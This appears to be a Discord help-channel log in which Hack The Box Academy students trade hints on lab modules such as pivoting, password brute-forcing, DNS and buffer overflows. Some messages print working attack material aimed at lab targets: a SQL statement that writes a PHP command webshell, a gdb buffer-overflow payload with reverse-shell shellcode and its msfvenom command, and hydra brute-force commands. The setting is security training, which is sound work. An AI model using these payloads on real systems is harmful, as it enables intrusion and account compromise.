Enter key or passphrase ("/dev/sda2"):  
guestmount: no operating system was found on this disk

If using guestfish ‘-i’ option, remove this option and instead
use the commands ‘run’ followed by ‘list-filesystems’.
You can then mount filesystems you want by hand using the
‘mount’ or ‘mount-ro’ command.

If using guestmount ‘-i’, remove this option and choose the
filesystem(s) you want to see by manually adding ‘-m’ option(s).
Use ‘virt-filesystems’ to see what filesystems are available.

If using other virt tools, this disk image won’t work
with these tools.  Use the guestfish equivalent commands
(see the virt tool manual page).
┌─[✗]─[htb]─[~]
└──╼ $ls -l /media/mnt
abstract agate
#

Guys has anyone done the NTLM Relay Attacks Module?
I'm stuck on the Skill Assessment, can anyone give me hints?

dire abyss
#

moving past that now.. for the actual zone transfer i get "transfer failed" with dig. "dig axfr ns.inlanefreight.htb @10.129.128.1270"

acoustic owl
# autumn palm ```guestmount --add Backup.vhd --inspector --ro /media/mnt Ent...
Linux Uprising Blog

This is a guide on how to access a BitLocker-encrypted Windows volume from Linux, useful in cases of dual-booting Windows 10, 8 or 7, and a Linux distribution. It covers how to decrypt and mount the BitLocker partition from the command line, as well as how to add it to /etc/fstab, so it's automatically mounted on boot.

fathom pendant
fathom pendant
autumn palm
#

Thanks!

acoustic owl
quasi jungle
#
└──╼ [★]$ xfreerdp -cert-ignore /v:10.129.153.218 /u:john /p:november
[17:55:13:768] [7506:7507] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:55:13:768] [7506:7507] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Getting connection reset when trying to rdp```
https://academy.hackthebox.com/module/147/section/1327
fathom pendant
#
so it will look like this
quasi jungle
fathom pendant
quasi jungle
fathom pendant
#

read the question :)

quasi jungle
fathom pendant
#

but what is the QUESTION asking

#

:)

quasi jungle
fathom pendant
#

...Then you're not looking at the right user

#

each user for each question is different

#

something you CAN do to limit your username list down is to go to C:\Users

quasi jungle
#

Found it, console was cropped so didn't see the entire privileges

verbal tiger
verbal tiger
acoustic owl
verbal tiger
verbal tiger
proven sable
#

hi

#

im new to HTB and was wandering how to get unlost

fathom pendant
#

many people are new to HTB

#

this isn't a general chat

#

you can read #welcome on how to access more of the server :)

#

if you have a question regarding an academy module feel free to ask though

proven sable
#

thank you

unique palm
#

Hey im on the Pivoting Module and cant figure out what i am missing on the webserver pivoting with rpivot.
My "proxychains firefox-esr" times out...

#

Those are my rpivot shells

#

wtf why this works

#

can i dm you really quick?

unique palm
#

yea

#

i think firefox didnt work since it tried to do outbound connections which timed out since its a internal network

rough acorn
#

I need a hand for what seems a rather simple affair in the Footprinting module, SMTP chapter, last question. I need to enumerate users so I tested with nmap's script, smtp-user-enum, tested the different commands with each but none one of them gives me the answer.
nmap just shows every single name from the list as valid and smtp-user-enum shows none as valid.

fathom pendant
rough acorn
fathom pendant
#

i forget if you need to append a domain or not

#

i always forget that part

rough acorn
#

if I test vrfy root I get something where I got nothing for AAAA so it seems you do not.

#

I have not

#

I let it run until it's done. They give you a small list of names to test

fathom pendant
#

yeah

rough acorn
#

if you add a domain then it seems to always succeed with VRFY

fathom pendant
#

:)

rough acorn
#

I mean, it succeeds but it's not right

fathom pendant
#

there's only one user

rough acorn
#

should be

fathom pendant
#

but yeah adding the domain makes it false positive for whatever reason

flat copper
#

Anyone working on Intro to Assembly? I have the correct answer to an exercise, like 100% correct, and I cannot figure out why HTB wont take the answer in literally any format I put in. I am about done with the module, but won't be able to complete it until I can get this one page completed lol

#

OH MY GOD I GOT IT. Nevermind kek

tulip dragon
#

how long could It take to complete the pentest job path

#

avg

fathom pendant
#

a few months to a year depending on experience

lusty thicket
rough acorn
fathom pendant
#

wait time >= 15

rough acorn
#

I get it randomly at 10

warm flame
#

Hey folks working on the skills assessment for secure coding. I think I'm gonna need JSNice for at least renaming* the local variables, but this is the output I recieve.

rough acorn
fathom pendant
#

SMTP is a slow service is why

upper crest
#

hello everyone, i'm having some issues with the first part of the skill assessment for Game Reversing & Modding "Fixman", which is patching the fact that i cant press space to launch the game, i'm using DnSpy and i modified CheckStart(), Start() and Update() methods, can someone give me some help ? prayge thanks

eternal tusk
#

Hi guys, I have an issue with the Linux Fundamental module's File Descriptors and Rederictions section.

Question: How many files on the system have the ".log" file extension?
The command I used: locate *.log
My answer: 24 (WHICH IS INCORRECT)

acoustic owl
#

locate is obviously the wrong command. 😉

lusty thicket
#

😉😉

south folio
eternal tusk
#

I tried this command too find / -type f -name "*.log"

eternal tusk
#

What is the logic behind this?

tawdry vapor
#

anyone can help me with command injection - skills assessments?

eternal tusk
#

Is it for error redirection?

fathom pendant
#

At the end of your command add | wc -l which counts the output lines

eternal tusk
#

Thanks @fathom pendant .

#

Sorry, I struck with this section of file descriptors and redescriptors. I am unable to wrap my head around it, honestly!
I tried youtube to learn this section but nothing helped much.

warm flame
limber river
unique palm
#

Anybody knows whats up here? Im trying to DNS tunnel and this error is not explained in the sections so far

tawdry vapor
#

anyone can help me with command injection - skills assessments?

rustic sage
#

Hi all, I'm working on the Web Fuzzing skills assessment module, and I've been stuck on this question for a few hours now.

Q: "In the page from the previous question, you should be able to find multiple parameters that are accepted by the page. What are they?"

I tried running the ffuf command with the burp text file, targeting the first param (FUZZ=key) and I get something back (for the sake of not spoiling for others). Since I'm expecting another param I then tried FUZZ=key&FUZZ2=key, but didn't get anything back.

Lastly, I tried param fuzzing on other pages, but haven't found anything of significance so I'm truly lost at this point. Any ideas of what I could be missing?

lusty thicket
lusty thicket
tawdry vapor
eternal tusk
#

Guys, I have got another question I am stuck with in the same module: Linux Fundamentals and section: File Descriptors and Redirectors.

Question: How many total packages are installed on the target system
Commands I have used: dpkg -l | wc -l and dpkg --get-selections | wc -l

And to my surprise both of these commands give a different answer: 748 and 743 respectively, and none of them is correct.

fathom pendant
eternal tusk
#

And both the answers are incorrect 😢

lusty thicket
lusty thicket
south folio
#

I am in ATTACKING WEB APPLICATIONS WITH FFUF -> Sub-domain Fuzzing

I think isn't hard to resolve, but when I tried to exec a command

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.com/

I receive

:: Progress: [4997/4997] :: Job [1/1] :: 341 req/sec :: Duration: [0:00:27] :: Errors: 4997 ::

eternal tusk
tawdry vapor
lusty thicket
rustic sage
lusty thicket
lusty thicket
south folio
rustic sage
#

Is your target ip still valid?

south folio
rustic sage
#

@south folio

south folio
#

I have received from ping command

eternal tusk
south folio
rustic sage
#

Trying using the -H command, that shouldn't make a difference, but it's worth a try

thorn urchin
#

inlanefreight.com is a real site that they setup for certain modules, so make sure the module youre on actually uses that one

#

cause 90% of the time its inlanefreight.htb or inlanefreight.local

south folio
thorn urchin
south folio
#

No I need to scan for sub-domain and I need to have a valid url. This is not present in the LAN

thorn urchin
#

which module and section are you doing

rustic sage
#

@acoustic owl Because if it's not found in the DNS, then it will defer to /etc/hosts and try to match an IP from there

thorn urchin
#

thats what he was pointing out

rustic sage
#

Oh, okay

south folio
rare swan
#

Module: Attack Web Apps Section:Exploiting Web Vulnerabilities in Thick-Client Applications -- actually modified the invoker.java file as follows:```import java.io.FileOutputStream;
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
String methodName = (new Object() {}).getClass().getEnclosingMethod().getName();
logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
if (AccessCheck.checkAccess(methodName, this.user)) {
return "Error: Method '" + methodName + "' is not allowed for this user account";
}
this.action = new ActionMessage(this.sessionID, "open");
this.action.addArgument(foldername);
this.action.addArgument(filename);
sendAndRecv();
String desktopPath = System.getProperty("user.home") + "\Desktop\fatty-server.jar";
FileOutputStream fos = new FileOutputStream(desktopPath);

if (this.response.hasError()) {
    return "Error: Your action caused an error on the application server!";
}

byte[] content = this.response.getContent();
fos.write(content);
fos.close();

return "Successfully saved the file to " + desktopPath;

}
<SNIP>^```` -- but now i get error: Failed to open file '/opt/fatty/files/..s/files' when running app ------- any hints?

acoustic owl
thorn urchin
rustic sage
#

@acoustic owl I see, and that makes sense. Thanks for clearing that up

regal stream
#

The Password Attacks module states the following:
"Single Crack Mode is one of the most common John modes used when attempting to crack passwords using a single password list. It is a brute-force attack, meaning all passwords on the list are tried, one by one, until the correct one is found."

Would this not be a dictionary attack?
I also found the following over on StackExchange: https://security.stackexchange.com/a/37074

thorn urchin
south folio
south folio
#

Ok but the ffuf don't work

lusty thicket
south folio
#

Not in mine

thorn urchin
lusty thicket
thorn urchin
#

@south folio I checked, your ffuf is against the http service

#

although it works for me on either

south folio
#

What the content of your /etc/hosts?
Because I need only the Ip Address of inlanefreight.com, and if it's incorrect cannot works.

thorn urchin
#

Nothing. I told you to ignore that part

lusty thicket
thorn urchin
#

if you have any entries remove them

#

*any non default entries

south folio
#

Now is clean:

Your system has configured 'manage_etc_hosts' as True.

As a result, if you wish for changes to this file to persist

then you will need to either

a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl

b.) change or remove the value of 'manage_etc_hosts' in

/etc/cloud/cloud.cfg or cloud-config from user-data

127.0.1.1 upcloud-capture-droplet upcloud-capture-droplet
127.0.0.1 localhost

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

127.0.0.1 localhost
127.0.1.1 htb-un7abfxl8f htb-un7abfxl8f.htb-cloud.com

#

Uhm

#

Discord convert a pund caracter

#

pound

#

Yes I can ping also from my Pc and the Whois show me same Ip address: 134.209.24.248

drifting vortex
#

Could I get some help with the IMAP/POP3 host based enumerations?

#

Getting stuck where it asks for the admin email address

#

When connecting to openssl s_client -connect [IP address]:pop3s
I can type USER Admin and I get a "+OK" response meaning its an available email account on the server

mental ice
#

wherpwpwd

drifting vortex
#

tyring to login with the credentils robin:robin but I might be able to figure this out

lusty thicket
drifting vortex
#

No idea what I'm missing here

lusty thicket
#

command tags.. 1 a

#

..

drifting vortex
lusty thicket
drifting vortex
#

My brain did not process the ones above where they clearly show the command tags sadglas

orchid pine
#

guys can t found found which version of poolkit are venurable too local pe

#

pkexec is present from 2009 till 2021

#

but i want to know all the version that are affected any idea

rustic sage
#

I'm doing the Session Security module, and the Attack Box is not on the page at all? Or in any other page?

#

It's not that it's not spawning, it's literally not there.

stone ether
#

hi guys ive been stuck on this for a couple of days does any know why im not able to run this module> intro to brute force > username brute force

lusty thicket
fathom pendant
#

Is the issue

stone ether
fathom pendant
stone ether
tawdry vapor
#

can someone help me with command injection skills assessments?

rustic sage
#

dontasktoask

vital adder
#

<@&861185840277487616>

quasi jungle
#

How long is it supposed to take to brute force the password for ssh

novel matrix
novel matrix
quasi jungle
novel matrix
vital adder
quasi jungle
quasi jungle
#

still taking insanely long

next bronze
#

try ftp, and give it more threads

ruby ginkgo
ruby ginkgo
ruby ginkgo
fathom pendant
ruby ginkgo
#

yes

fathom pendant
#

I wouldn't recommend splitting the mutated list up but that's personal preference

ruby ginkgo
#

do you recommend doing this - ||cat mutated.list | sort | uniq > new_mutated.list||

fathom pendant
#

If you used the command from the module it should already have sorted the unique passwords

#

That's what sort -u does

quasi jungle
#

used the exact command

#

a hour later

#

hydra -l sam -P mut_password.list ssh://10.129.184.26
now using this to brute force the ssh

slate creek
#

Just finished the AD module!! I'm not going to lie, I need to do it again soon. it was a steep learning curve for me and I feel I know nothing... did most of the Assessments using tips, asking for help....! want to say thanks to HTB team for their good work and this great community for being always helpful

candid lily
#

introduction to whitebox or whitebox 101, which one should i get?

quasi jungle
misty current
candid lily
#

intro to WB it is then thanks

#

i cant afford secure coding with student sub

misty current
#

You can't get any of the WB with student sub either.

#

Cuz, all of them are T3

ruby ginkgo
quasi jungle
ruby ginkgo
#

yes

paper gust
slate gate
paper gust
#

--force is a command for developers and people working on the code base

#

it should NOT be used by users

#

it will bypass blocking warnings and could lead to very poor or unexpected behavior from hashcat

#

even to the degree of false positives/negatives

slate gate
#

thats for creating a mutation wordlist tho

paper gust
#

i mean, sure, but would you want to bypass blocking errors in your list creation?

slate gate
#

what false positive are you fearing in that

paper gust
#

the rule engine is still running similar to how it would during an attack

#

errors in that will mean errors in your output there as well

#

but again, poor behavior in general like crashes or memory problems are never good

#

even if it doesnt lead to worst case scenario

slate gate
#

i use --force because god protects me from unintended behaviors prayge

ruby ginkgo
#

for the people who still struggling in mutation, use "||hashcat --force password.list -r custom.rule --stdout > mut_password.list||" then if the output is 187xxxx then use ||cat mutated.list | sort | uniq > new_mutated.list|| to reduce it into 94k then use hydra to crack ftp instead of ssh. use Higher Thread and verbose. i cracked it in an hour.

paper gust
#

and i keep adding warnings specifically to that flag because of people using it 🙂

next bronze
#

hm why is --force suggested to be used in the module then, should probably change it if it shouldn't be used

paper gust
#

you would not believe the amount of issues we get because of old tutorials suggesting stupid stuff like that

#

or using just outdated or generally poor advice

#

add in the fact that chatGPT knows exactly 0 anything about how to operate hashcat and you get a LOT of unhappy people in my DMs and in our discord server/forums/github issues

next bronze
#

NotLikeThis image asking chatgpt on how to use hashcat instead of rtfm

paper gust
#

lol, and with all that documentation we have too

#

its not perfect but it's a hell of a lot more than most tools

next bronze
#

my favourite literature is the hashcat examples page

paper gust
#

it's also built into the tool as well 🙂

#

dynamically created and queried from the hashes present in each module for self testing during kernel init

next bronze
#

oh dang didn't know that

paper gust
#

i think it's been brought up before unfortunately

next bronze
#

welp here we go again I guess

paper gust
#

there was a hashcat module as well

#

though i haven't heard much about it recently

#

not sure if it finally got rewritten/pulled/etc.

next bronze
#

it's still there.. is it also not good? 😅

paper gust
#

it's not bad, it's just aging quickly

#

lots of stuff that was outdated almost immediately

#

like the WPA section

next bronze
#

ah I see, I suppose that seems like a drive by mention, will definitely need something more in depth for WPA related things

paper gust
#

yeah

#

I wonder if they'd let me update it/rewrite it 🤔

next bronze
#

that would be pretty awesome to have the hashcat module penned by a dev

quasi jungle
vestal merlin
#

hi guys. I'm on password attack module and trying to install crackmapexec. I've tried pipx install crackmapexec, docker pullbyt3bl33d3r/crackmapexec, sudo apt install crackmapexec. None of them works. Can anyone help ? Thanks in advance.🥹🥹🥹

#

and i'm already stuck on the first question. which user list should i use?

quasi jungle
#

How long are passwords usually supposed to take to crack in a htb academy module

brisk geode
#

if its more than that then youre in a rabbit hole

quasi jungle
#

Yeah, then I am in one

next bronze
#

uh if you're in the password attack module it will take longer

quasi jungle
next bronze
next bronze
#

password attack module would disagree with that

brisk geode
#

i havent found one that took more than 5 mins(idk if they updated the module lemme check)

#

nope they didnt

vestal merlin
#

i download the resources provided, i think it's taking forever to brute force

hallow kiln
#

Unless we're talking about brute-forcing and not cracking, then you definitely have some lengthy waits in the password attacks module

hexed tinsel
#

cmd=ls

quasi jungle
# hallow kiln Use a different list

https://academy.hackthebox.com/module/147/section/1391
Using the provided password.list then mutating it with the provided rules
Then using hydra to brute force the password with the user sam as provided

*Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. *

hallow kiln
#

So we are talking about brute-forcing

quasi jungle
hallow kiln
#

SSH takes forever to brute-force, try a different service or you will indeed be waiting for hours

quasi jungle
#

used ftp for 2 hours

hallow kiln
#

Did you use a higher thread count? -t 48

#

Should take about 20 minutes for ftp

quasi jungle
hallow kiln
#

I suggested -t 48 for a reason, some people experience issues where 64 threads skips over the correct password, not always the case, but still

#

Overall, this section sucks because of the long unnecessary wait, the rest of the module gets better and contains information you're unlikely to see anywhere else, I don't recommend skipping it

proud lantern
#

hey guys, i have an issue with the WIndows fundamentals skills assessment

#

basically im asked to make a user named jim and then find his SID, i have found the correct SID using the wmic command, but when i input it the question says incorrect answer

#

i have googled the answer and found that it directly matches the SID i provided.

#

very confused

#

anyone had any issues with this?

quasi jungle
#

Also found the flag

lusty thicket
orchid pine
#

hello guys im doing the skill assessement for linux pe

#

and im stuck on flag5

#

i can run a cmnd as sudo but ssems like not dropping a root shell it was an easy skill assessement but the flag 5 is driving me crazy

slate gate
#

What does the header on the title page say when opening the aquatone_report.html page with a web browser? (Format: 3 words, case sensitive)

#

sorry but i dont get what it is asking lol

quartz swan
#

https://academy.hackthebox.com/module/116/section/1512

Attacking DNS Problems..?
||
I tried editing the /etc/hosts file, including inlanefreight.htb as well as the relevant IP target IP address, however, I am unable to dig for any name servers using dig ns inlanefreight.htb command (Returns no name servers). Without a name server, I was unable to proceed on. Any hints on this? Thanks!||

fathom pendant
fathom pendant
quartz swan
fathom pendant
#

no

quartz swan
#

Hmm alright guess I have to review my DNS module on this..

fathom pendant
#

you still need to tell it where to query from

#

otherwise it's attempting to use public DNS servers and will fail

orchid pine
lusty thicket
slate gate
#

Yeah I don't understand what the question is asking

lusty thicket
fathom pendant
slate gate
#

my report is called Aquatone Report guys

#

i know what a title is lol

lusty thicket
#

3 words

slate gate
#

you ar enot helping lol

frail ruin
#

hi guys is academy worth it? i completed old modules 1 year ago lfi wordpress hacking kinda liked it there was tricks which i never seen elsewhere. I'm considering whether the new modules offer similar content and value

#

for example modern web hacking

#

white box testing

slate gate
lusty thicket
next bronze
#

isn't it just right there when you open the report lol

fathom pendant
#

^

slate gate
#

thats what i thought but nothing i tried worked lol

#

lmao nevermind got it

#

it was the first thing i tried byt i guess i copied a new line or a space or something and didnt like it

#

so i was trying everything else possible and was confused

orchid pine
#

so

#

i have the flag5

#

i did it by exploiting the sudo version

#

not the sudo -l

#

part and im pretty sure ii need to do it the sudo -l

next bronze
#

is there something when you run sudo -l?

orchid pine
#

yeah

#

busctl

#

and in gtfobins

#

saying that it can pe

#

to rrot

autumn pilot
#

Write on one line or the slowmode will be increased

orchid pine
#

i tried multiple times nothing and my shell is fullly interactive btw

next bronze
#

what error did you get

orchid pine
#

wait lemme show you

#

ill sent you privat so i dont spoil

next bronze
#

sure

potent grail
#

hey everyone !
i stuck in this module https://academy.hackthebox.com/module/147/section/1322
Can someone help me ?
The task states that it is necessary to connect via SSH to the user kira with cracked password.The thing is, I completed this module two months ago, but due to circumstances, I didn't finish it completely. Now, I have no idea where to find the password for it.

fathom pendant
#

It's in an earlier section that talks about firefox iirc

#

But it's like the first few sections

potent grail
fathom pendant
#

Oof

#

Run an attack on ftp with the mutated list

#

And you'll get their password

potent grail
#

thanks

fathom pendant
#

¯_(ツ)_/¯

primal mesa
#

Module: Attacking Common Applications - Skills Assessment II
Question: What is the FQDN of the third vhost?
I have tried to dig all 3 hosts with @ip, did not get anything in return. All hosts added.
;; no servers could be reached

Please someone help me, I have answered all but this.

smoky viper
#

Hi
Please does anyone know why Firefox keeps timing out when running it with proxychains (rpivot) section.
I'm pretty sure my commands are correct

ebon coral
#

Also, if you answered the other questions I think you should have the answer for this also. Maybe the format of your answer is what is wrong.

modest girder
quartz swan
#

Attacking Common Services - Easy , Help Needed

||Tried searching up on some help on forums after managing to find out that I would need to upload a webshell. Unfortunately, the forums gave a website that requires me to have a metasploit module which I would like to avoid (and can't find anyway)
Using SQL to upload a shell in MariaDB, I tried the following SQL Command Injection:
SELECT "<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET['cmd']) {system($_GET['cmd']);} ?> </pre></BODY></HTML>" INTO OUTFILE 'C:\xampp\htdocs\cmd.php';

However, when I navigate to my backdoor shell, it appears that it is giving this error:
Fatal error: Uncaught Error: Call to undefined function ​​system() in C:\xampp\htdocs\cmd.php:1
Stack trace:
#0 {main}
thrown in C:\xampp\htdocs\cmd.php on line 1

Any ideas on what may be going on? Thank you!||

weary torrent
#

guys in this module : Coercing Attacks & Unconstrained Delegation , we are not given a windows machine to rdp to simulate the attack, only kali.what am i missing here?

next bronze
quartz swan
#

The shell you provided can only execute one command per link if you know what I mean haha

#

So I would like a 'interactive shell' if possible

autumn palm
#

Anyone know why i am getting a SEGMENTATION Fault in this case here. (Module: STACK-BASED BUFFER OVERFLOWS ON LINUX X86)

This is the command:

$ env - gdb
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r $(python -c 'print "\x41" * ( 2064 - 95 - 124 - 4) +"\x90" * 124 + "\xb8\xb3\x39\x2b\x40\xdb\xde\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\x83\xed\xfc\x31\x45\x0e\x03\xf6\x37\xc9\xb5\xc9\x9c\xfa\xd5\x7a\x60\x56\x70\x7e\xef\xb9\x34\x18\x22\xb9\xa6\xbd\x0c\x85\x05\xbd\x24\x83\x6c\xd5\xc9\x73\x8f\x24\x5e\x76\x8f\x36\xdd\xff\x6e\x86\x87\xaf\x21\xb5\xf4\x53\x4b\xd8\x36\xd3\x19\x72\xa7\xfb\xee\xea\x5f\x2b\x3e\x88\xf6\xba\xa3\x1e\x5a\x34\xc2\x2e\x57\x8b\x85" + "\xf5\xd4\xff\xff"')```

The return address is specified as: 0xffffd4f5 on which we find NOP instructions. Prior to executing RET in leavemsg()
=> 0x5655573a <+173>:   ret
```(gdb) x/x $esp
0xffffd5bc:     0xffffd4f5
(gdb) x/x 0xffffd4f5
0xffffd4f5:     0x90909090```

At 104 bytes later we find the first four opcodes:
```x/x 0xffffd4f5+104
0xffffd55d:     0x2b39b3b8

Execution will hit the NOP sled and eventually spawn a reverse shell shell but it will kill it right away due to segfault:

(gdb) x/i 0xffffd4f5
   0xffffd4f5:  nop
...
Hits SHELLCODE and creates reverse shell
...
htb-student@nixbof32skills:~$ nc -vnlp 4163
Listening on [0.0.0.0] (family 0, port 4163)
Connection from 127.0.0.1 53950 received!

The program will then kill thes hell due to segmentation fault:

0xffffd5b8 in ?? ()

Shellcode:```
msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=4163 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

next bronze
quartz swan
next bronze
#

like spaces in commands? just url encode it

quartz swan
sly kelp
#

I need to verify a method that I am trying related to Windows PE module and pillaging section. Can i dm someone who is available

meager wren
#

Hey

#

Where can i find the chats for Cryptography or the Challenges from the hackthebox app.

#

Can somebody help me up?

modest girder
#

Can't seem to spawn a target IP in my modules. Stuck on Target is spawning... Tried to reset a target and it never spawned a new one.

Anything I should be doing on my end?

radiant flicker
#

@modest girder having the same issue here

rose temple
#

Modules targets don't spawn! 😦

modest girder
#

Well at least we know we're all in this together lol

rose temple
#

@modest girder and @radiant flicker, I've tried changing the VPN server, and Europe server 2 seems to work, targets spawn. 👍

modest girder
sterile epoch
#

Hi, I was reading into sekurlsa::pth vs asktgt and found a /ptt flag in Rubeus can someone give me an example as to how to use it. I do not get luid part i.e what is it and how to get that

bright quiver
#

any word on the target machines coming back online at some point sson?

orchid pine
#

last modules

#

i will redo the whole path after i finish

#

with suggested boxes

#

this course really helped me to understand thnigs i still rennber befor i started i couldnt do annything but now at least i can understand things and i can do some easy things totaly by myself

compact patrolBOT
slender shoal
bright quiver
#

@slender shoal ok thank you

rare swan
limber wasp
#

Is anyone having trouble spawning modules. I'm trying to spawn the shells and payloads live engagement for a while now, and it just loads. I've disconnected from vpn , reconnected, deleted ovpn file , redownloaded it, logged out , and then back in and it still doesn't spawn the target. I have 1 question left to finish that module.

#

well i guess they are.

grizzled schooner
#

Need a nudge on Footprinting - IPMI

Ran metasploit found the username and a password hash, module says something about using ||hashcat|| for a specific IPMI for 8 chars etc... I ran ||hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u <hash>|| but that didn't work... It wants the cleartext password, so I am just a little stuck on how to move forward

dreamy solar
#

hello guys I'm having problems this question : I don't receive the logins, why ?

thorny heath
#

Module: Attacking Common Services
Section: Attacking FTP

I have a problem with the machine in this task. When i try to connect to the ftp service it says 'Connection refused', it does the same thing when i try with netcat too. Am I doing something wrong or is the machine that is not working properly ?

thorny heath
lusty thicket
thorny heath
dreamy solar
thorny heath
thorny heath
lusty thicket
thorny heath
dreamy solar
thorny heath
warm flame
#

Has anybody here passed the Secure Coding: javascript 101

dreamy solar
thorny heath
#

did you send this payload to /phishing/send.php ?

manic terrace
#

Hi, under Linux Fundamentals on the Service and Process Management section, I entered the command:
systemctl list-units --type=service | grep "Load AppArmor profiles managed internally by snapd"
it works as the question asks but doesn't accept it as the answer. What else should I try?

thorny heath
# dreamy solar

try re-submitting the url and wait for a minute, you should normally see a request with admin credentials i just re-did the task

dreamy solar
#

can you send what you sent?

#

because I send my query and it doesn't seem to work

latent glen
#

In Attacking Common services - DNS. I found a flag but it wont accept it...

thorny heath
thorny heath
orchid pine
#

89%

#

Wbu

bright quiver
fathom pendant
#

it opens up a webserver in the directory you launch it in

#

so you can't just do regular filepaths for it; it's local to whatever directory you launch in

formal nimbus
#

hello, in htb challenge it s allowed to consult how an app work or not ?

#

i mean consulting files of the app

fathom pendant
#

?

#

that's unrelated to academy modules there is a #challenges channel where you can ask for assistance but you need to link your account following the instructions in #welcome

orchid pine
bright quiver
#

@fathom pendant and @orchid pine I am ....

#

unless i am using incorrect file formats for the type it is such as not being exe or so

fathom pendant
#

you're not understanding how it works

#

you don't need to specify a filepath